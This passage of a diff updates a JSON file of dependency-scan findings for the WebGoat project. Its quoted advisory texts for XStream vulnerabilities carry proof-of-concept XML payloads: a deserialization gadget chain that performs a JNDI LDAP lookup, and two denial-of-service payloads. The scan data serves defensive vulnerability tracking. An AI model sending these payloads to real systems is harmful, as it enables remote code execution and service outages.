cause a StackOverflowError due to excessive recursion in GSON's serialization\r\n        claimSet.toString();\r\n    }\r\n}\r\n```\n## Remediation\nUpgrade `com.nimbusds:nimbus-jose-jwt` to version 9.37.4, 10.0.2 or higher.\n## References\n- [Bitbucket Commit](https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/393a96fd858a5a74276158ca9740b67ca9484b4d)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/583/stackoverflowerror-due-to-deeply-nested)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/593/back-port-cve-2025-53864-fix-to-9x-branch)\n- [GitHub Commit](https://github.com/google/gson/commit/1039427ff0100293dd3cf967a53a55282c0fef6b)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.\r\n\r\n*Note:* This vulnerability does not exist running Java 15 or higher, and is only relevant when using `XStream`'s default blacklist.\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.15 or higher.\n## References\n- [Exploit Repo](https://github.com/Al1ex/CVE-2020-26258)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce)\n- [XStream Advisory](https://x-stream.github.io/CVE-2020-26258.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.security:spring-security-oauth2-jose",
-                  "version": "6.1.5"
-                },
-                {
-                  "name": "com.nimbusds:nimbus-jose-jwt",
-                  "version": "9.24.4"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000052-0000-4000-8000-000000000052",
+          "key": "00000000-0000-0000-0000-000000000033",
           "locations": [
             {
               "package": {
-                "name": "com.nimbusds:nimbus-jose-jwt",
-                "version": "9.24.4"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 62
-            }
-          },
-          "title": "Uncontrolled Recursion"
+          "problems": [
+            { "id": "CWE-918", "source": "cwe" },
+            { "id": "GHSA-4cch-wxpw-8p28", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.15)"],
+              "created_at": "2020-12-16T11:07:48.518257Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 6.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:03:54.135949Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.7,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.337729Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.7,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:49.053065Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 4.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:41.844465Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F",
+              "disclosed_at": "2020-12-16T11:01:34Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99833",
+                "probability": "0.93680"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "functional",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967",
+              "initially_fixed_in_versions": ["1.4.15"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-19T05:03:44.998875Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2020-12-16T17:24:55Z",
+              "references": [
+                {
+                  "title": "Exploit Repo",
+                  "url": "https://github.com/Al1ex/CVE-2020-26258"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/6740c04b217aef02d44fba26402b35e0f6f493ce"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2020-26258.html"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26258.yaml"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2020-26258", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 447 } },
+          "title": "Server-Side Request Forgery (SSRF)"
         },
-        "id": "00000052-0000-4000-8000-000000000052",
+        "id": "00000000-0000-0000-0000-000000000033",
         "links": {},
         "relationships": {
           "fix": {
@@ -16307,25 +5612,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "com.nimbusds:nimbus-jose-jwt",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.4.10"
-                        },
-                        {
-                          "name": "org.springframework.security:spring-security-oauth2-jose",
-                          "version": "6.4.11"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "com.nimbusds:nimbus-jose-jwt",
-                          "version": "9.37.4"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.15"
                         }
                       ],
                       "is_drop": false
@@ -16334,7 +5631,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000052-0000-4000-8000-000000000052",
+              "id": "00000000-0000-0000-0000-000000000033",
               "type": "fixes"
             }
           }
@@ -16344,13 +5641,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n        \u003cdefault\u003e\r\n          \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n          \u003cthreshold\u003e525\u003c/threshold\u003e\r\n        \u003c/default\u003e\r\n        \u003cint\u003e700\u003c/int\u003e\r\n        \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n          \u003cresourceCache/\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003csun.swing.SwingLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003carg\u003eldap://localhost:1099/CallRemoteMethod\u003c/arg\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/sun.swing.SwingLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n          \u003c/tables\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or highe",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003cis class='java.io.ByteArrayInputStream'\u003e\r\n            \u003cbuf\u003e\u003c/buf\u003e\r\n            \u003cpos\u003e-2147483648\u003c/pos\u003e\r\n            \u003cmark\u003e0\u003c/mark\u003e\r\n            \u003ccount\u003e0\u003c/count\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21341.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16361,7 +5658,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000053-0000-4000-8000-000000000053",
+          "key": "00000000-0000-0000-0000-000000000034",
           "locations": [
             {
               "package": {
@@ -16372,18 +5669,114 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 164
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "CVE-2021-21341", "source": "cve" },
+            { "id": "GHSA-2p3x-qw9c-25hh", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:07:54.751721Z",
+              "credits": ["threedr3am"],
+              "cvss_base_score": 7.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:42.563902Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.067576Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:49.003385Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:50:41.128443Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+              "disclosed_at": "2021-03-23T13:06:47Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.95721",
+                "probability": "0.23434"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:49.003385Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:23.143282Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21341.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 240 } },
           "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000053-0000-4000-8000-000000000053",
+        "id": "00000000-0000-0000-0000-000000000034",
         "links": {},
         "relationships": {
           "fix": {
@@ -16397,7 +5790,7 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
@@ -16410,7 +5803,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000053-0000-4000-8000-000000000053",
+              "id": "00000000-0000-0000-0000-000000000034",
               "type": "fixes"
             }
           }
@@ -16420,50 +5813,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework.security:spring-security-web](https://mvnrepository.com/artifact/org.springframework.security/spring-security-web) is a package within Spring Security that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Missing Authorization allowing Spring Security authorization rules to be bypassed for static resources.\r\n\r\n**Note:**\r\n\r\nNon-Static Resources Are Not Affected by this vulnerability. This is because handlers for these routes use predicates to validate the requests even if all security filters are bypassed. \r\n\r\nSpring Security states that for this to impact an application, all of the following conditions must be met:\r\n\r\n1) It must be a WebFlux application.\r\n\r\n2) It must be using Spring's static resources support.\r\n\r\n3) It must have a non-permitAll authorization rule applied to the static resources support.\n## Remediation\nUpgrade `org.springframework.security:spring-security-web` to version 5.7.13, 5.8.15, 6.2.7, 6.3.4 or higher.\n## References\n- [Blog](https://www.deep-kondah.com/spring-webflux-static-resource-access-vulnerability-cve-2024-38821-explained/)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/0e257b56ce35402558a260ffa6b368982f9a7934)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/4ce7cde15599c0447163fd46bac616e03318bf5b)\n- [PoC](https://github.com/mouadk/cve-2024-38821)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38821)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.\r\n\r\n## Workaround\r\n\r\nThis effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.\r\n\r\n## PoC\r\n\r\nCreate a simple HashSet and use XStream to marshal it to XML.  Replace the XML with following snippet and unmarshal it with XStream.\r\n\r\n```xml\r\n\u003cdiv class=\"Source XML\"\u003e\u003cpre\u003e\r\n\u003cset\u003e\r\n  \u003cset\u003e\r\n    \u003cset\u003e\r\n      \u003cset\u003e\r\n        \u003cset\u003e\r\n          \u003cset\u003e\r\n            \u003cstring\u003ea\u003c/string\u003e\r\n          \u003c/set\u003e\r\n          \u003cset\u003e\r\n            \u003cstring\u003eb\u003c/string\u003e\r\n          \u003c/set\u003e\r\n        \u003c/set\u003e\r\n        \u003cset\u003e\r\n          \u003cstring\u003ec\u003c/string\u003e\r\n          \u003cset reference='../../../set/set[2]'/\u003e\r\n        \u003c/set\u003e\r\n      \u003c/set\u003e\r\n    \u003c/set\u003e\r\n  \u003c/set\u003e\r\n\u003c/set\u003e;\r\n\u003c/pre\u003e\u003c/div\u003e\r\n\u003cdiv class=\"Source Java\"\u003e\u003cpre\u003eXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n\u003c/pre\u003e\u003c/div\u003e\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391)\n- [XStream Advisory](http://x-stream.github.io/CVE-2022-41966.html)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-security",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.security:spring-security-web",
-                  "version": "6.1.5"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000054-0000-4000-8000-000000000054",
+          "key": "00000000-0000-0000-0000-000000000035",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.security:spring-security-web",
-                "version": "6.1.5"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "critical"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 230
-            }
-          },
-          "title": "Missing Authorization"
+          "problems": [
+            { "id": "CWE-400", "source": "cwe" },
+            { "id": "GHSA-j563-grx4-pjpv", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.20)"],
+              "created_at": "2022-12-25T13:47:57.152289Z",
+              "credits": ["Lai Han"],
+              "cvss_base_score": 5.9,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:07:26.652888Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:52:55.493617Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.662968Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:04.700205Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+              "disclosed_at": "2022-12-25T13:39:32Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.88349",
+                "probability": "0.04274"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897",
+              "initially_fixed_in_versions": ["1.4.20"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:48.662968Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2022-12-25T14:12:46.613303Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "http://x-stream.github.io/CVE-2022-41966.html"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2022-41966", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 184 } },
+          "title": "Denial of Service (DoS)"
         },
-        "id": "00000054-0000-4000-8000-000000000054",
+        "id": "00000000-0000-0000-0000-000000000035",
         "links": {},
         "relationships": {
           "fix": {
@@ -16471,21 +5952,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-web",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
